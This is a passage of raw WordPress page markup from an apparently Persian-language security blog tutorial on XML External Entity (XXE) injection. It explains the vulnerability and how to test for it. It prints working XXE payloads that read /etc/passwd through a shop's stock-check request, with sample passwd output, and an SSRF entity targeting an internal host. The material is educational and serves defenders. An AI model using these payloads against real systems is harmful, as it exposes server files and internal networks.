For example:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-dad9480 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"dad9480\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-52f8d40\" data-id=\"52f8d40\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8197e81 elementor-widget elementor-widget-text-editor\" data-id=\"8197e81\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code>&lt;!DOCTYPE foo [ &lt;!ENTITY ext SYSTEM &quot;file:\/\/\/path\/to\/file&quot; &gt; ]&gt;<\/code><\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a4779af elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a4779af\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column 
elementor-element elementor-element-600c8a0\" data-id=\"600c8a0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3a38d3f elementor-widget elementor-widget-text-editor\" data-id=\"3a38d3f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>(Note that in the example above, two slashes belong to the file:\/\/ protocol and the third slash begins the absolute path.)<br \/>It is these external entities that create the conditions for the XXE Injection vulnerability.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a115664 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a115664\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-57ec9cb\" data-id=\"57ec9cb\" 
data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5d72bd7 elementor-widget elementor-widget-text-editor\" data-id=\"5d72bd7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"ext-entity-injection\"><span style=\"font-size: 12pt;\">XXE Injection, or the injection of external entities<\/span><\/h2>\nIn what follows we first look at the XXE vulnerability and where it originates, and then, through practical examples, learn the various ways these vulnerabilities are exploited and the different XXE attacks that result.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-b735ce8\" data-id=\"b735ce8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d161727 elementor-widget elementor-widget-image\" 
data-id=\"d161727\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail wp-image-11107\" alt=\"\u062a\u0632\u0631\u06cc\u0642 xxe\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy-150x150.jpg 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy-300x300.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy.jpg 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cfa135c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cfa135c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3d0e7b1\" data-id=\"3d0e7b1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0804d9f elementor-widget elementor-widget-heading\" data-id=\"0804d9f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<span class=\"elementor-heading-title elementor-size-medium\">\u0628\u0627 \u062f\u06cc\u06af\u0631 \u062d\u0645\u0644\u0627\u062a Injection \u0622\u0634\u0646\u0627 
\u0634\u0648\u06cc\u062f:<\/span>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bad1fbb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bad1fbb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-eb6cc10\" data-id=\"eb6cc10\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-461ab62 elementor-button-info elementor-align-center elementor-widget elementor-widget-button\" data-id=\"461ab62\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm elementor-animation-grow\" href=\"\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">SQL Injection \u0686\u06cc\u0633\u062a\u061f<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1b766c9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1b766c9\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column 
elementor-col-100 elementor-top-column elementor-element elementor-element-958ac98\" data-id=\"958ac98\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-364d597 elementor-widget elementor-widget-text-editor\" data-id=\"364d597\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"xxe-injection\"><strong>What is the XXE vulnerability?<\/strong><\/h3>\n<p style=\"text-align: justify;\">XXE injection (short for XML External Entity injection) is a web security vulnerability that allows an attacker to interfere with the way a web application processes XML data. 
It typically allows an attacker to read files on the application server's filesystem and to interact with any back-end or external systems that the application itself can access.<\/p>\n<p style=\"text-align: justify;\">In some cases an attacker can escalate an XXE attack and use the XXE vulnerability to perform SSRF (Server Side Request Forgery) attacks, and in that way reach the server the application runs on or other back-end infrastructure.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0f5820a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0f5820a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c653e1e\" data-id=\"c653e1e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b04771a elementor-widget elementor-widget-text-editor\" data-id=\"b04771a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"occurance\">How does the XXE vulnerability arise?<\/h2>\nSome applications transfer data between the browser and the server in the form of XML files. These applications almost always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification itself contains features that are potentially dangerous, and even if an application does not need some of those features, standard XML parsers<sup>*<\/sup> still support all of them.\n\nAs noted earlier, external entities in XML are a type of Custom Entity whose declared value is loaded from somewhere outside the DTD in which they are declared. These external entities are of particular security importance because they make it possible to define an entity based on the contents of a file path or a URL.\n\n<em>* An XML parser, or XML processor, is the program or module responsible for parsing XML files so that the data in them can be read and used.<\/em>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fdbdb67 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fdbdb67\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-62fa4c5\" data-id=\"62fa4c5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ab2c9c6 elementor-widget elementor-widget-image\" data-id=\"ab2c9c6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"780\" height=\"439\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1.jpg\" class=\"attachment-large size-large wp-image-11088\" alt=\"what is xxe\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1.jpg 830w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1-300x169.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/1-Copy-min-1-768x432.jpg 768w\" sizes=\"(max-width: 780px) 100vw, 780px\" 
\/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-14c67df elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"14c67df\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container 
elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-84b13c5\" data-id=\"84b13c5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c3fdc4a elementor-widget elementor-widget-text-editor\" data-id=\"c3fdc4a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"types\"><span style=\"font-size: 12pt;\">What are the types of XXE attacks?<\/span><\/h3>\nXXE attacks come in several forms. Some of the main types of XXE injection attack are:\n<ul>\n \t<li><strong>Exploiting XXE to retrieve files: an external entity is defined whose value is the contents of a specific file, and that content is returned in the web application's response.<\/strong><\/li>\n \t<li><strong>Exploiting XXE to perform SSRF attacks: an external entity is defined whose value is a URL pointing to a back-end system.<\/strong><\/li>\n \t<li><strong>Exploiting blind XXE to exfiltrate data out-of-band: sensitive data is transmitted from the application server to a system under the attacker's control.<\/strong><\/li>\n \t<li><strong>Exploiting blind XXE to retrieve data via error messages: the attacker triggers a parsing error* whose message contains sensitive information.<\/strong><\/li>\n<\/ul>\n<strong><span style=\"font-size: 8pt;\">* A parsing error (parser error) is an error raised by the parser; it means that, for whatever reason, the parser could not parse and read the content. For example, if we define an external entity with the file:\/\/ scheme and a path that does not exist, referencing that entity produces this error.<\/span><\/strong>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d309f12 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d309f12\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-632b94e\" data-id=\"632b94e\" data-element_type=\"column\" 
data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-75a67d8 elementor-widget elementor-widget-text-editor\" data-id=\"75a67d8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"file-retrieval\"><span style=\"font-size: 12pt;\">Exploiting XXE to retrieve files<\/span><\/h3>\nTo perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to make two changes to the XML that is submitted to the web application:\n<ul>\n \t<li><span style=\"font-size: 10pt;\"><strong>Introduce (or edit) a DOCTYPE element that defines an external entity whose value is the path to the file.<\/strong><\/span><\/li>\n \t<li><span style=\"font-size: 10pt;\"><strong>Edit a data value in the XML that is returned in the application's response so that it uses the defined external entity.<\/strong><\/span><\/li>\n<\/ul>\nFor example, consider a shopping application that checks the stock level of a product by submitting the following XML to the server:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-12f1e14 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"12f1e14\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-125114e\" data-id=\"125114e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0027100 elementor-widget 
elementor-widget-text-editor\" data-id=\"0027100\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;file:\/\/\/etc\/passwd&quot;&gt; ]&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;stockCheck&gt;&lt;productId&gt;&amp;xxe;&lt;\/productId&gt;&lt;\/stockCheck&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4f6ffdc elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4f6ffdc\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f7a5420\" data-id=\"f7a5420\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c41bc6f elementor-widget elementor-widget-text-editor\" data-id=\"c41bc6f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>This XXE payload defines an external entity named xxe whose value is the contents of the file \/etc\/passwd, and then uses that entity inside the productId value. This causes the application's response to include the file's contents:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e1dbc28 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e1dbc28\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5f6ed40\" data-id=\"5f6ed40\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-316dc31 elementor-widget elementor-widget-text-editor\" data-id=\"316dc31\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code 
class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>Invalid product ID: root:x:0:0:root:\/root:\/bin\/bash <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b4d5e1d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b4d5e1d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c502b91\" data-id=\"c502b91\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9392a5c elementor-widget elementor-widget-text-editor\" data-id=\"9392a5c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>Note:<\/strong> in real-world XXE vulnerabilities, a submitted XML document usually contains a large number of data values, any of which might be used in the application's response. To test for XXE vulnerabilities systematically and reliably, you usually need to test each data node individually, that is, every place in the XML document where a data value appears. 
To test a node, define an entity, place it where the data value would go, and check whether its value is returned in the application's response. <\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-90eef78 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"90eef78\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2e1bbc5\" data-id=\"2e1bbc5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-126d655 elementor-widget elementor-widget-text-editor\" data-id=\"126d655\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"ssrf\"><span style=\"font-size: 12pt;\">Exploiting XXE to perform SSRF attacks<\/span><\/h3>\nBesides retrieving sensitive data, one of the main characteristics of XXE attacks is that they can be used to carry out <a href=\"https:\/\/liangroup.net\/blog\/%d8%aa%d8%b4%d8%b1%db%8c%d8%ad-%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-ssrf\/\"><strong>SSRF attacks<\/strong><\/a> (server-side request forgery). This vulnerability can be extremely serious, because it lets an attacker make the server-side application send HTTP requests to any URL that the server is able to reach.\nTo exploit an XXE vulnerability for SSRF, define an external entity in the XML whose value is the URL you want to target, and then use that entity in a data value. If you can use the defined entity in a data value that is returned in the application's response, you will see the response from the target URL inside the application's response, which gives you two-way interaction with the target back-end system through the application as an intermediary. Otherwise you can only perform blind SSRF attacks (which can still have very serious consequences).\n\nIn the following XXE example, an external entity causes the server to make a back-end HTTP request to an internal system within the organization's infrastructure:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-eaf4d8a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"eaf4d8a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-854bda1\" data-id=\"854bda1\" data-element_type=\"column\" 
data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6779da1 elementor-widget elementor-widget-text-editor\" data-id=\"6779da1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;http:\/\/internal.vulnerable-website.com\/&quot;&gt; ]&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9214e71 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9214e71\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1c1f084\" data-id=\"1c1f084\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1cb188d elementor-widget elementor-widget-text-editor\" data-id=\"1cb188d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"blind-xxe\"><a href=\"#blind-xxe\"><span style=\"font-size: 12pt;\">Blind XXE vulnerabilities<\/span><\/a><\/h3><p>Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, so server-side files cannot be retrieved directly.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-18916da elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"18916da\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 
elementor-top-column elementor-element elementor-element-f8b2382\" data-id=\"f8b2382\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9bc1922 elementor-widget elementor-widget-text-editor\" data-id=\"9bc1922\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Blind XXE vulnerabilities can still be found and exploited, but doing so requires more advanced techniques. Sometimes you can use out-of-band techniques to find such vulnerabilities and exploit them to exfiltrate data. And sometimes you can trigger parsing errors whose error messages disclose sensitive information.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-71bcd52\" data-id=\"71bcd52\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-846fccd elementor-widget elementor-widget-image\" data-id=\"846fccd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail wp-image-11108\" alt=\"blind xxe\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe-150x150.jpg 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe-300x300.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/blind-xxe.jpg 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7e4a29e 
